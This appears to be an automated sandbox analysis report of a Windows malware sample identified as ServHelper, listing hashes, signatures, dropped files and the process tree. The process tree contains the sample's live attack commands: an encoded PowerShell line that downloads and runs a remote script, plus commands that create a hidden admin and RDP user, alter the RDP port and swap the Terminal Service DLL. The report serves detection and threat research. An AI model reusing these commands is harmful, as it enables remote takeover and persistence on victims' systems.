Analysis

  • max time kernel
    50s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-08-2021 19:34

General

  • Target

    87dd0632a95ca24443f8c6363bc055e6.exe

  • Size

    5.9MB

  • MD5

    87dd0632a95ca24443f8c6363bc055e6

  • SHA1

    423785b67d20f4f5056ff6d9e34fda3c72a03bd4

  • SHA256

    266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce

  • SHA512

    c51d180cca074540f5ca9186e60509cfdb1c7e1a8651e691eac585df9f8352e256cedb86a4a340e0e8f5b1ed6d73ff270d92424259539c0c4c02a7048f2a75e2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe
    "C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp" "c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP"
          4⤵
            PID:1904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3848
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3252
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:2176
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3976
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2200
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2232
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1072
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2156
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1636
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:1832
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1432
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3100
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4000
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3884
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:4000
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2076
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2668
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1852
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:368
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc i0aAay1y /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2332
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc i0aAay1y /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2184
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc i0aAay1y /add
                          3⤵
                            PID:3876
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3840
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2008
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:1636
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2064
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:344
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                              3⤵
                                PID:1168
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1296
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:368
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:3704
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc i0aAay1y
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4056
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc i0aAay1y
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1652
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc i0aAay1y
                                  3⤵
                                    PID:684
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:424
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:2696
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                    PID:2752
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                      • Modifies data under HKEY_USERS
                                      PID:3872
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    1⤵
                                      PID:1296
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        2⤵
                                          PID:1208
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2268

                                      Network

                                      MITRE ATT&CK Enterprise v6

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp

                                        MD5

                                        61a26cc967cbe792b4ed22638776f04c

                                        SHA1

                                        b1223787103eaafaabe6d1d3f66c31b50dd0c9b9

                                        SHA256

                                        a3ec92ea114aa024a825046dee49cf3a82343305da4bc41885fc2704012b4ce6

                                        SHA512

                                        099b63da57b49e4dbbc0acec1592841c59268d35d0920b835fdc8be6be7b23a27a0027ce24404c95be54720bd2474e39063b323e05387cde4bd9b639ba98d20f

                                      • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                        MD5

                                        3447df88de7128bdc34942334b2fab98

                                        SHA1

                                        519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                        SHA256

                                        9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                        SHA512

                                        2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                      • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

                                        MD5

                                        2ac58884a6bc6115ac734d8f7e9dcff5

                                        SHA1

                                        7f1a83359e741a82aae8ead8f1b2dd67e76d93a5

                                        SHA256

                                        a328305f6d633db8b9de84d59a608d477d58b6c78b6f26a57303ced1d1acbf53

                                        SHA512

                                        dacfdeafe0e5e5370a3f8a49ec4505840508888c642310b6e482b7559116948145682e9b3964617734a74dfa9ecfddf0b7bf90f7751c34d7d08f6b6d6d800d4c

                                      • C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.dll

                                        MD5

                                        ac3ef7653d1f1794c99d0cfcdecb5287

                                        SHA1

                                        02b0d8cbfee43ceec86cb8e20315b77e3bc58237

                                        SHA256

                                        bbd4ce87c6375af22b2b96d5af290627013066c5afca43266546c0e0b01c3bf3

                                        SHA512

                                        69c3e361d8e65498bdd016f4c600b8cd5959e973a28ded6cbefa3cc0186c18c8f8e9fb367231eecc2609325ea8ca9a9c39b3c03f7131294a2100fc89d46a0517

                                      • \??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP

                                        MD5

                                        95168593db67746dd8c9d02f2ae09598

                                        SHA1

                                        20eda3f80444df0bc160f5b0d0ab4fa820618442

                                        SHA256

                                        fd09f4efd132c3db937fb45de242d5e7e3c392e5fe0a463cfd3ddd0d31f88c7f

                                        SHA512

                                        5e56ec1e41c8a3598aca2f02e83e27d515756ae3e89a622dcbebe672476e66e7a7103da610a14efaa0ff254d91dceb17228b9fdd9ca4132b8ac28b46429fc794

                                      • \??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.0.cs

                                        MD5

                                        4864fc038c0b4d61f508d402317c6e9a

                                        SHA1

                                        72171db3eea76ecff3f7f173b0de0d277b0fede7

                                        SHA256

                                        0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                        SHA512

                                        9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                      • \??\c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline

                                        MD5

                                        1beeba88aa06c9ccfc2eb492a3480184

                                        SHA1

                                        e2fab8ebd651a0f3bbfb5091e8ba1e0da570aaa4

                                        SHA256

                                        fa1faab8896afddb38ce7365397017b2f147bd2b172ca2198eb605680e5b986d

                                        SHA512

                                        af6028a0e9cf69e35814d387ef702ad1a253a32766e0c6e29b4271e4fa0a10f25f9f1141e8b8aadbf07436cb53781538017cc6c6c22ca48c870b4d1496f7a2c8

                                      • \Windows\Branding\mediasrv.png

                                        MD5

                                        3a434e30924f88a47fa7fc31e1821106

                                        SHA1

                                        b0d245fb30c2b311a2cdf7998c5109a2151cf5a4

                                        SHA256

                                        c1908713db3a7c8fa0dda2f4a332b00b7082910a08704d4b37b26f39f4712b28

                                        SHA512

                                        74c0a5382a725c78db73b9dcc71445747b05171dda27c21d6688800323fb3daf365d6ce05259415db7e7504f42e401a2535a25eefa49988c605ae2853413e84e

                                      • \Windows\Branding\mediasvc.png

                                        MD5

                                        c174d5f4b03f158ed3c3ac6579bc9d9f

                                        SHA1

                                        9a3f5c59cdcefe0097accab914e1896030e40e62

                                        SHA256

                                        7ed9b5536d19ad840881d068719dbc95da230bf00ba647bf1340bc5666daf2c7

                                        SHA512

                                        8ebd5f4a064c960eaaf0d5be4fe1463aa85e092bf4a3f81d05bb14df6e5400c80a5018a1c2a0d94f4618ce032b41567e66d0f328b443c13e09ac9e0110004f17

                                      • memory/344-357-0x0000000000000000-mapping.dmp

                                      • memory/368-352-0x0000000000000000-mapping.dmp

                                      • memory/368-359-0x0000000000000000-mapping.dmp

                                      • memory/684-362-0x0000000000000000-mapping.dmp

                                      • memory/1072-341-0x0000000000000000-mapping.dmp

                                      • memory/1168-358-0x0000000000000000-mapping.dmp

                                      • memory/1208-365-0x0000000000000000-mapping.dmp

                                      • memory/1300-136-0x0000000000000000-mapping.dmp

                                      • memory/1432-345-0x0000000000000000-mapping.dmp

                                      • memory/1636-343-0x0000000000000000-mapping.dmp

                                      • memory/1636-356-0x0000000000000000-mapping.dmp

                                      • memory/1652-361-0x0000000000000000-mapping.dmp

                                      • memory/1832-344-0x0000000000000000-mapping.dmp

                                      • memory/1852-351-0x0000000000000000-mapping.dmp

                                      • memory/1904-139-0x0000000000000000-mapping.dmp

                                      • memory/2008-355-0x0000000000000000-mapping.dmp

                                      • memory/2064-216-0x0000016EBD9E8000-0x0000016EBD9EA000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2064-166-0x0000016EBD9E0000-0x0000016EBD9E2000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2064-193-0x0000016EBD9E6000-0x0000016EBD9E8000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2064-167-0x0000016EBD9E3000-0x0000016EBD9E5000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2064-160-0x0000000000000000-mapping.dmp

                                      • memory/2076-446-0x0000000000000000-mapping.dmp

                                      • memory/2088-221-0x0000013571D16000-0x0000013571D18000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2088-202-0x0000000000000000-mapping.dmp

                                      • memory/2088-219-0x0000013571D13000-0x0000013571D15000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2088-272-0x0000013571D18000-0x0000013571D1A000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2088-217-0x0000013571D10000-0x0000013571D12000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2156-342-0x0000000000000000-mapping.dmp

                                      • memory/2176-299-0x0000000000000000-mapping.dmp

                                      • memory/2184-353-0x0000000000000000-mapping.dmp

                                      • memory/2200-337-0x0000000000000000-mapping.dmp

                                      • memory/2232-338-0x0000000000000000-mapping.dmp

                                      • memory/2268-378-0x00000245632F3000-0x00000245632F5000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2268-432-0x00000245632F8000-0x00000245632F9000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2268-381-0x00000245632F6000-0x00000245632F8000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2268-377-0x00000245632F0000-0x00000245632F2000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/2268-366-0x0000000000000000-mapping.dmp

                                      • memory/2696-363-0x0000000000000000-mapping.dmp

                                      • memory/3100-346-0x0000000000000000-mapping.dmp

                                      • memory/3252-298-0x0000000000000000-mapping.dmp

                                      • memory/3668-143-0x000001791DDA0000-0x000001791DDA1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3668-128-0x000001791E050000-0x000001791E051000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3668-120-0x0000000000000000-mapping.dmp

                                      • memory/3668-125-0x000001791DD40000-0x000001791DD41000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3668-129-0x000001791DDC0000-0x000001791DDC2000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3668-130-0x000001791DDC3000-0x000001791DDC5000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3668-145-0x000001791DDC6000-0x000001791DDC8000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3668-146-0x000001791DDC8000-0x000001791DDC9000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3668-152-0x000001791E800000-0x000001791E801000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3668-153-0x000001791EB90000-0x000001791EB91000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3704-360-0x0000000000000000-mapping.dmp

                                      • memory/3848-275-0x000002113D346000-0x000002113D348000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3848-245-0x0000000000000000-mapping.dmp

                                      • memory/3848-273-0x000002113D340000-0x000002113D342000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3848-274-0x000002113D343000-0x000002113D345000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3848-288-0x000002113D348000-0x000002113D34A000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3872-364-0x0000000000000000-mapping.dmp

                                      • memory/3876-354-0x0000000000000000-mapping.dmp

                                      • memory/3884-348-0x0000000000000000-mapping.dmp

                                      • memory/3916-114-0x000001A5BC590000-0x000001A5BC9B0000-memory.dmp

                                        Filesize

                                        4.1MB

                                      • memory/3916-119-0x000001A5BC156000-0x000001A5BC157000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3916-117-0x000001A5BC153000-0x000001A5BC155000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3916-118-0x000001A5BC155000-0x000001A5BC156000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3916-116-0x000001A5BC150000-0x000001A5BC152000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3976-300-0x0000000000000000-mapping.dmp

                                      • memory/4000-347-0x0000000000000000-mapping.dmp

                                      • memory/4000-445-0x0000000000000000-mapping.dmp